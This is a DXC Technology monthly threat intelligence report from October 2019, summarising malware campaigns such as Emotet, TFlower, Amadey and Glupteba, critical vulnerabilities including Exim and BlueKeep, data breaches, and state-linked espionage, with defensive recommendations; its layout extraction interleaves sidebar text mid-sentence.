Threat Intelligence Report

October 2019

- MAN - UFACTUR ING/PUBLIC SECTOR

IN THIS ISSUE • October is Cyber Security Awareness Month • Ecuador suffers massive data breach • Emotet returns after 4-month break • Campaign targets U.S. taxpayers • APT33 targets aerospace and energy sectors October 2019

About this report

Fusing a range of public and proprietary information feeds, including DXC’s global network of Mark Hughes security operations centers and Senior Vice President and General Manager of Security cyber intelligence services, this DXC Technology report delivers a overview of major October is Cyber Security Awareness Month and the perfect time to assess the threat to incidents, insights into key trends your enterprise and the motivations of attackers. This month saw the return of Emotet and strategic threat awareness. after four months of inactivity, a new ransomware strain targeting enterprises, and new phishing campaigns that target enterprises and users globally. Data security also fea- This report is a part of tures prominently this month as Ecuador investigates an unsecured database containing DXC Labs | Security, which provides the personal details of over 20 million citizens. Read more in this month’s report. insights and thought leadership to the security industry. Table of Contents Cyber Security Awareness Month: Know your Multi-industry Intelligence cutoff date: Threat attackers 26 September 2019 updates

Emotet returns after 4-month break Multi-industry

TFlower ransomware poses new threat to enterprises Multi-industry

Campaign targets U.S. taxpayers Multi-industry

Cross-platform Glupteba malware adds worm Multi-industry capability

PsiXBot hides command and control name resolution Media/ Entertainment in HTTPS Vulnerability Critical vulnerability in Exim mail server Multi-industry updates Updates released to counter critical vulnerabilities in Multi-industry Google Chrome and Microsoft Internet Explorer

Multi-industry Exploit code released for BlueKeep vulnerability

LastPass Password manager leaks credentials Multi-industry U.S. government contractor Miracle Systems Defense Incidents/ potentially breached Breaches Ecuador citizens data exposed in unsecured database Public Sector, Technology

Ransomware attacks disrupt 49 U.S. school districts Public Sector and educational institutions

French authorities dismantle global botnet Multi-industry Nation state Asian telecommunications companies targeted by Technology and & geopolitical Chinese-linked threat actors Communications updates Iranian-linked threat actors target energy and Defense 2 aerospace sectors October 2019

Threat updates Cyber Security Awareness Month: Know your attackers The key to being cyber aware is understanding the motivations and tactics of your attackers. To mark Cyber Security Awareness Month, DXC focuses on the five primary types of cyber attackers: nation-state, cybercriminals, hacktivists, lone-wolf hackers and insider threats.

Nation-state attackers: These state-backed cyber criminals typically are focused on trying to project power in a region or gain an economic or political advantage over a rival. Their activities range from traditional espionage to disrupting adversaries by leaking confidential data.

Nation-states are often associated with advanced persistent threats (APTs), in which an attacker gains access to a system and remains undetected for an extended period. These groups typically use the most sophisticated techniques. One of the most infamous nation- state hacking groups is Russian-backed APT28, also known as Strontium or Fancy Bear, which was recently observed exploiting internet of things (IoT) devices, including a VOIP 8,000 phone, an office printer and a video decoder. Microsoft enterprise customers targeted or compromised by nation- Nation-state activity is increasing around the globe. New reports accuse the Chinese state attacks in 2019 government of intrusions into telecommunications networks to track Asian dissidents, and Iran is likely to ramp up its cyber espionage efforts against Saudi Arabia and the United States. Government agencies, defense contractors and critical infrastructure are key potential targets.

Cyber criminal groups: Cyber criminal groups, motivated by financial gain, have shifted from targeting end users to more sophisticated big game hunting, with large corporations and government agencies as their targets.

The public sector has become a major target. Over the past 6 months, cyber criminal campaigns used ransomware to lock down city government services in five U.S. states, plus 23 Texas towns, and 500 schools and colleges.

Notorious payment-card skimming family Magecart is also acting opportunistically. Employing a new tactic, Magecart bots recently infected 17,000 websites by exploiting 78 days improperly configured Amazon Cloud S3 buckets to steal card information. Global median time to detect a These types of threats underscore the need for rigorous cyber defenses as well as a plan breach in 2019 for how to respond and recover — or whether to pay or not pay the ransom.

Hacktivists: Hacktivists are politically motivated, ideology-driven actors. One well-known hacktivist group, Anonymous, first made headlines when it retaliated against the Church of Scientology’s perceived internet censorship using distributed denial-of-service (DDOS), spamming and other attacks.

Increasingly, social media is the target, as evidenced by the account takeover of Twitter cofounder Jack Dorsey — crusader against online hate groups — which was used to send out pro-Nazi tweets. Even law enforcement is not immune, with London’s Metropolitan Police Twitter account sending out a series of bizarre and profane messages in July.

3 October 2019

Hacktivists typically have lower levels of technical sophistication, and social media accounts offer a soft target that allows them to project their disruptive efforts to a wide audience. Organizations should carefully consider security basics around corporate social media platforms, including monitoring, auditing and requirements for complex passwords and multifactor authentication.

Lone-wolf hackers: Not part of an organized crime group, lone-wolf hackers are often opportunists motivated by financial gain. In some cases, lone-wolf hackers can grow their ranks quickly. In addition to the two lone wolves arrested for the TalkTalk hack of nearly 160,000 customer accounts, authorities suspected that at least 10 more individuals were involved in the scheme to extort the company’s CEO.

Lone-wolf hackers are more likely to target smaller organizations, public agencies and NGOs. Their aim is usually to gain access to data that can be sold on the dark web or 184% sensitive or embarrassing data that can be used for extortion. Increase in average ransom payment in Q2 2019 Insider threats

Unlike organized cyber crime groups, malicious insiders often operate on a small scale, looking for opportunities for personal gain, or for retribution against a real or perceived slight by their employer.

The prospect of monetary gain drives many insider threats with opportunities to embezzle or sell stolen proprietary information. For example, a disgruntled IT engineer at Scale AI hacked the company network and made hundreds of small fraudulent payments into PayPal accounts before getting caught. In 2018, Tesla CEO Elon Musk announced that an insider exported large amounts of highly sensitive Tesla data to unknown third parties.

Another potential motivator for insiders is whistleblowing. Disenfranchised workers can do Group 4 significant reputation damage by publicly exposing what they consider to be unethical practices, even if the accusations later prove to be unfounded. Groups 1 and 2

Insider threats are among the most complex to detect and prevent. A maliciously motivated insider often has intimate knowledge of the company’s internal network and Group 5 security configurations, as well as the requisite skills to operate bespoke tooling.

Preventing such attacks requires a layered approach and mature security architecture. AI-powered endpoint protection and user-behavior analytics within the SIEM can help Group 6 identify malicious actions, such as the clearing of audit logs, suspicious access of materials or access of systems at unusual times. Further, privileged users should be audited more frequently and thoroughly.

Group 11 Emotet returns after 4-month break Emotet spam campaigns have returned after a four-month period of inactivity with a new malspam campaign.. Group 12 On September 16, Malwarebytes and Spamhaus spotted a series of new spam emails written in Italian, Polish and German that contained a document-themed lure in the form of either a malicious attachment or links to malicious documents online. This was followed approximately 24 hours later by English-language phishing messages with a subject line containing the phrase “Payment Remittance Advice.” 4 October 2019

Known Emotet Spreader Modules This latest wave of phishing messages targeted domains across a range of countries NetPass including Argentina, Germany, the United States and the United Kingdom. Recovers all network passwords stored on a system for the logged-on user. Impact Outlook Scraper Possibly the biggest threat posed by Emotet is that it can be used as a delivery vector for Scrapes names, dates, email addresses more dangerous payloads. Emotet Trojans have been partnered with TrickBot and Ryuk and email bodies from Outlook accounts. Information found in the email account is ransomware strains to create a combination that ensures maximum penetration through then used to send out additional phishing the network, stealing valuable data and encrypting systems to extort organizations into emails from the compromised account. paying large ransoms. WebBrowserPassView Password recovery module that captures DXC perspective passwords stored by Internet Explorer, Denial of initial access is key to malware prevention. Effective identity and access Google Chrome, Safari and Opera. Credentials found are passed to the management controls, network access controls, phishing mail protections, training Credential Enumerator module. and next-generation endpoint solutions can all help prevent account compromise and Mail PassView malware delivery. In addition to prevention, organizations should construct and regularly Recovers passwords and account details test data recovery plans. Backups should be logically isolated to protect them from for email clients such as Microsoft Outlook, infection. Windows Mail, Mozilla Thunderbird, Hotmail, Source: ThreatPost Yahoo! and Gmail. Credentials found are passed to the Credential Enumerator module. TFlower ransomware poses new threat to enterprises Credential Enumerator A new crypto-ransomware threat known as TFlower has been seen targeting corporate Enumerates writable network share drives environments. First discovered in August 2019, TFlower makes its way into a corporate over SMB using credentials found on the network after attackers compromise machines through exposed Remote Desktop system and brute force techniques. Once a writable system is found, Emotet propagates Services. to the new system. Impact This attack vector enables adversaries to infect local machines with TFlower before attempting to move laterally through the network using PowerShell Empire and other tools to generate even more infections.

DXC perspective TFlower falls into a trend of cyber criminals using big game hunting tactics, which are increasingly targeting businesses and government agencies with ransomware rather than individual users in attempts to elicit greater ransoms and generate a higher return on their time investment.

Ransomware is too profitable for criminal groups for it to disappear, and DXC expects the threat will continue to evolve for the foreseeable future. Source: Bleeping Computer

Campaign targets U.S. taxpayers A new phishing campaign with U.S. tax-related email lures is infecting victims with the Amadey botnet.

The Amadey bot was first seen for sale on Russian malware forums in February 2019. Amadey itself is fairly limited, with only credential-stealing capability. Its primary function is to serve as a downloader/installer for other malware and campaigns.

Impact This campaign begins with a phishing email notifying the user of an income tax refund from the U.S. Internal Revenue Service. When the user clicks the link, the fake tax portal tells the user to download a document (in zip file format) to fill out and upload. If the 5 October 2019

user extracts the zip contents, a Visual Basic Script is executed, infecting the victim with Amadey.

DXC perspective Phishing campaigns can present quite convincing lures. Timely emails with current topics — especially those like tax communications that may be commonplace and appear legitimate — require added vigilance to protect against infections and scams. Periodic cyber security training should present phishing scenarios to equip users with awareness of such threats. Source: Cofense

Cross-platform Glupteba malware adds worm capability Updates to Glupteba malware include a router exploit and usage of Windows built-in utilities.

Glupteba is a long-lived infostealer malware, active since at least 2011 and with infections in almost every country globally since 2018. Now, Glupteba’s code base has been updated to Golang, an open source programming language that may enable cross- platform execution (on different operating systems). Initial infection is via fake software advertisements and free download bundles.

Impact Glupteba establishes persistence with Windows task scheduler (schtasks.exe) and then installs additional modules using Windows Certificate Utility (certutil.exe), with some of the malicious downloaded modules even hosted on Microsoft Azure. Glupteba scans the network for unpatched Windows PCs to exploit with EternalBlue and looks for vulnerable MikroTik routers to exploit other networks.

DXC perspective Malware with worm capability is a critical threat to internal networks, especially in a corporate environment where strong defenses are sometimes only part of the perimeter. Asset discovery, patching, network segregation and role separation are vital tactics in removing some of the intrinsic trusts that make corporate networks vulnerable to worm attacks. Source: Cybereason

PsiXBot hides command-and-control name resolution in HTTPS In mid-August 2019 a new version of the PsiXBot malware was seen using Google’s DNS over HTTPS (DoH) service to resolve C2 server domains. PsiXBot was first observed in 2017 and has been classified as an information, credential and cryptocurrency stealer.

Impact This latest version uses Google’s free public DoH service. In traditional DNS, a query is sent cleartext to a local ISP or public DNS server, and the response (resolved IP address) is sent back to the requesting client. DoH is secured with HTTPS (SSL/TLS), so intermediary devices cannot observe the request or response. By utilizing Google DoH, PsiXBot can evade typical detection and blocking based on the malware C2 domain name.

This new version of PsiXBot also contains an unfinished module that in a future version will capture evidence of the Windows user viewing pornography-related content. This is likely for blackmail or sextortion payment scenarios.

6 October 2019

DXC perspective Just as HTTPS provides secrecy and security for web viewing and online transactions, DoH provides secrecy and privacy for domain name resolution. We continue to see malware that uses and abuses new web technologies for evasion. A layered security approach with end-to-end inspection is necessary to stay ahead of these advances. Source: ProofPoint Vulnerability Updates Critical vulnerability in Exim mail server On September 6, 2019, the Exim development team released a security update for a critical remote code execution (RCE) vulnerability designated CVE-2019-15846. Exim is a popular open source mail transport agent (MTA) used on the Internet to send and receive email messages.

Impact Attackers who successfully exploit the vulnerability will gain root access, enabling full administrative access to the target systems. The software’s default configuration affects all versions of Exim, up to and including version 4.92.1.

DXC perspective Currently, there are no reports of this vulnerability being exploited in the wild. However, given it is possible to remotely trigger this vulnerability without credentials or user interaction, it has the potential to be exploited as part of a fast-moving, global malware attack.

It is highly likely that public exploits for these vulnerabilities will be available in weeks or days. Historically, unauthenticated remote code execution vulnerabilities such as these are prime targets for inclusion in automated and worm-based attacks. DXC recommends that organizations escalate patching for vulnerable Exim deployments. Source: Exim Development Team

Updates released to counter critical vulnerabilities in Google Chrome and Microsoft Internet Explorer In September Google and Microsoft released a series of security updates to counter critical remote code execution vulnerabilities in their Chrome and Internet Explorer web browsers.

Impact Exploiting the vulnerabilities on both platforms would allow an attacker to execute code and require the user to visit a website hosting specially crafted web pages containing malicious code. Microsoft elected to bypass its normal monthly update pattern and release the patch as an emergency out-of-band security update to counter active attacks seen in the wild. DXC has not seen any evidence to support active exploitation of this vulnerability at the time of writing. There are currently no reports of the Chrome vulnerabilities being exploited in the wild.

DXC perspective Web browsers have become the primary mechanism for accessing network-connected systems and are installed on almost all end user devices by default. This makes browser access a very attractive target for threat groups. 7 October 2019

Users are often lured to malicious websites using spam email, spam instant messages, search engine advertisements, malvertising campaigns and other enticements so malware can be installed.

Browser updates should be applied to all systems, including servers, to ensure that these vulnerabilities are mitigated. Windows systems likely have Internet Explorer installed by default, and the security update should be applied even if Internet Explorer is not commonly used. Source: Microsoft, Google

Proof-of-concept exploit code released for BlueKeep vulnerability On September 6, 2019, Rapid7 released an initial public exploit module for CVE-2019- 0708, also known as BlueKeep, for the Metasploit exploitation framework. The initial public module is limited to the Windows 7 and Windows Server 2008 R2 platforms and requires a nondefault configuration change on Server versions of Windows for successful exploitation — a limitation that may be removed in future updates.

Impact While it’s likely the more advanced threat actors have been working on exploits for the BlueKeep vulnerability since its disclosure, the release of the public exploit module for the Metasploit framework makes it much more accessible to lower-capability threat actors.

DXC perspective Rapid7 has placed limitations on the capabilities of the public module; however, it is likely these will be removed or circumvented by technically adept actor groups that could lead to the module being included as part of a botnet or worm.

DXC recommends organizations ensure patching of vulnerable Windows deployments has been completed. Source: Rapid7 Resources: Microsoft Incidents and breaches U.S. government contractor Miracle Systems potentially breached On September 9, 2019, security researcher Brian Krebs reported that the U.S. Secret Service was investigating a potential breach of Miracle Systems, a government contractor serving more than 20 federal agencies.

Impact Access to several systems belonging to Miracle Systems was put up for sale on a Russian- language cybercrime forum in mid-August for 6 bitcoins (approximately $60,000). Screenshots posted to the cybercrime forum as proof of access included internet addresses linked to systems at several U.S. government agencies.

Miracle Systems has stated the data and network information for sale was from older testing systems, and that the systems affected were test systems and not connected to any government clients.

DXC perspective According to news accounts, the CEO of Miracle Systems believes the attacker gained 8 October 2019

system access through a phishing attack, despite corporate warnings sent to staff about the dangers of malicious emails.

Continuous education of employees on the dangers of phishing, particularly how to recognize suspicious emails, is imperative, but should be augmented with additional security measures. Effective identity and access management controls, two-factor authentication, network access controls, phishing mail protections, training and next- generation endpoint solutions can all help prevent account compromise. Source: KrebsOnSecurity

Public data exposed in unsecured database in Ecuador On September 16, security researchers at vpnMentor reportedly discovered an unsecured database containing over 20 million records on Ecuadorian citizens. The database contained 20.8 million user records, despite Ecuador’s having a population of only 16.6 million, and included details on children born as recently as spring 2019.

Impact 3,816 The data contained citizens’ full names, dates of birth, places of birth, home addresses, Number of publicly disclosed data marital status, national ID numbers, work information, phone numbers and education breaches in first 6 months of 2019 levels. According to news media, the data appears to have been gathered from multiple government sources by Novaestrat, a company that provides analytics services for the Ecuadorian market.

DXC perspective This data breach reveals a significant amount of personal data about Ecuadorian citizens Other News that may lead to identity theft and the targeting of specific individuals in future cyber attacks.

The exposure is the most recent example of data being publicly stored online without passwords. Although usually caused by human error rather than malicious intent, data exposure has been a recurring theme in 2019.

Implementation of security fundamentals, such as appropriate authentication configuration, patch management and the visibility and audit of assets could have prevented nearly all 2019 exposures. Organizations with databases holding sensitive information should further harden their defenses by preventing public IP access where possible, avoiding common ports, closing unnecessary services and requiring the use of Ransomware attacks disrupt 49 U.S. proxies for access. school districts and educational Source: ZDNet institutions

LastPass Password manager leaks credentials Nation State & Geopolitical Updates North Korean hackers targeting ATMs Asian telecommunications companies targeted by threat actors in India linked to China French authorities dismantle global Earlier this month intelligence officials and security consultants blamed groups affiliated botnet with the Chinese government for intrusions into telecommunications networks to track dissidents in central and southeast Asia. The targeting of specific telecoms operators How Twitter CEO Jack Dorsey’s closely follows several public reports about Beijing’s use of compromised websites and account was hacked iOS vulnerabilities to target the Uighur and other dissident communities.

Impact The intrusions reportedly stemmed from more than one group of Chinese operators, and 9 targeted telecoms networks in at least Turkey, Kazakhstan, India, Thailand and Malaysia; October 2019

however, the specific companies compromised have not been currently disclosed. China has denied any involvement in cyber attacks.

DXC perspective Industry reporting, along with China-based intrusions previously observed by DXC’s strategic intelligence partners, indicate a sustained campaign by China to use its cyber capabilities to collect information on dissident communities.

DXC assesses with high confidence that these operations will continue to target dissident communities and will likely escalate in the future. It is also likely that these operations will be expanded to include academic, nongovernmental organizations (NGOs), and news media organizations that interact with and conduct research into these communities and the impact of state policies on these groups. Source: Crowdstrike Intelligence, Volexity, Reuters

Iranian-linked threat actors target energy and aerospace sectors Industry reporting in late September 2019 identified a spear phishing campaign targeting aerospace, petrochemical and energy sector organizations in the United States, Saudi Arabia and South Korea.

Impact The campaign emails include advertisements for jobs in Saudi Arabian aviation companies and Western organizations and contain recruitment-themed lure documents that contain links to malicious HTML application (HTA) files. The HTA files contain job descriptions and links to job postings on employment websites that would be relevant to targeted individuals, as well as embedded code to install a custom backdoor in the system.

Based on previous operational targeting and the tactics used in this operation, APT33, an Iranian threat group with links to Iran’s Islamic Revolutionary Guard Corps (IRGC), is believed to be behind this operation.

DXC perspective APT33 is a highly skilled and well-resourced adversary with a history of cyber espionage activity dating back to 2013. Since March 2019, APT33 has been observed targeting U.S. government and financial sector entities, as well as Saudi companies involved in healthcare, metals, engineering and technology.

DXC believes this activity may indicate an expansion in Iran’s cyber espionage efforts, potentially in response to the deterioration in political relations between Iran, Saudi Arabia and the United States. Intelligence also suggests this activity may be indicative of a wider ongoing operational movement, or the laying of groundwork for future cyber espionage operations.

Organizations need to monitor their networks for evidence of suspected APT33 activity. Source: ThreatPost , FireEye

10 October 2019

Learn more Thank you for reading the Threat Intelligence Report. Learn more about security trends and insights from DXC Labs | Security.

DXC Labs | Security

DXC Labs delivers thought leadership technology prototypes to enable enterprises to thrive in the digital age.

DXC Labs | Security brings together our world-class advisors to develop strategic and architectural insights to reduce digital risk. DXC’s Cyber Reference Architecture is at the heart of our research, providing clients with detailed guidance on methods to efficiently resolve the most challenging security problems. We help clients minimize risk while taking maximum advantage of the digital commons.

Lean more at www.dxc.technology/securitylabs

11 October 2019

DXC in Security Recognized as a leader in security services, DXC Technology helps clients prevent potential attack pathways, reduce cyber risk, and improve threat detection and incident response. Our expert advisory services and 24x7 managed security services are backed by 3,500+ experts and a global network of security operations centers.

DXC provides solutions tailored to our clients’ diverse security needs, with areas of specialization in Intelligent Security Operations, Identity and Access Management, Data Protection and Privacy, Security Risk Management, and Infrastructure and Endpoint Security. Learn how DXC can help protect your enterprise in the midst of large-scale digital change. Visit www.dxc.technology/security.

Stay current on the latest threats www.dxc.technology/threats

About DXC Technology As the world’s leading independent, end-to-end IT services company, DXC Technology (NYSE: DXC) leads digital transformations for clients by modernizing and integrating their mainstream IT, and by deploying digital solutions at scale to produce better business outcomes. The company’s technology independence, global talent, and extensive partner network enable 6,000 private and public-sector clients in 70 countries to thrive on change. DXC is a recognized leader in corporate responsibility. For more information, visit www.dxc.technology and explore thrive.dxc.technology, DXC’s digital destination for changemakers and innovators.